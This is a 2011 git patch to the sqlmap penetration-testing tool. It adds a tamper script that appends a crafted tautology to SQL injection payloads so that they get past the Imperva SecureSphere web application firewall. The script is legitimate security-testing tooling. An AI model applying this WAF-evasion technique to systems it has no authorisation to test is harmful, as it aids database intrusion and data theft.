From b7433011f8b80326a1336a78edb911967af588b2 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 8 Jul 2011 22:48:03 +0000
Subject: [PATCH] new tamper script by request

---
 tamper/securesphere.py | 39 +++++++++++++++++++++++++++++++++++++++
 1 file changed, 39 insertions(+)
 create mode 100644 tamper/securesphere.py

diff --git a/tamper/securesphere.py b/tamper/securesphere.py
new file mode 100644
index 000000000..f9e9ccd03
--- /dev/null
+++ b/tamper/securesphere.py
@@ -0,0 +1,39 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.common import randomRange
+from lib.core.data import kb
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.NORMAL
+
+def dependencies():
+    pass
+
+def tamper(payload):
+    """
+    Appends special crafted string
+
+    Example:
+        * Input: AND 1=1
+        * Output: AND 1=1 and '0having'='0having'
+
+    Notes:
+        * Useful for bypassing Imperva SecureSphere WAF
+        * Reference: http://seclists.org/fulldisclosure/2011/May/163
+    """
+
+    retVal = payload
+
+    if payload:
+        retVal += " and '0having'='0having'"
+
+    return retVal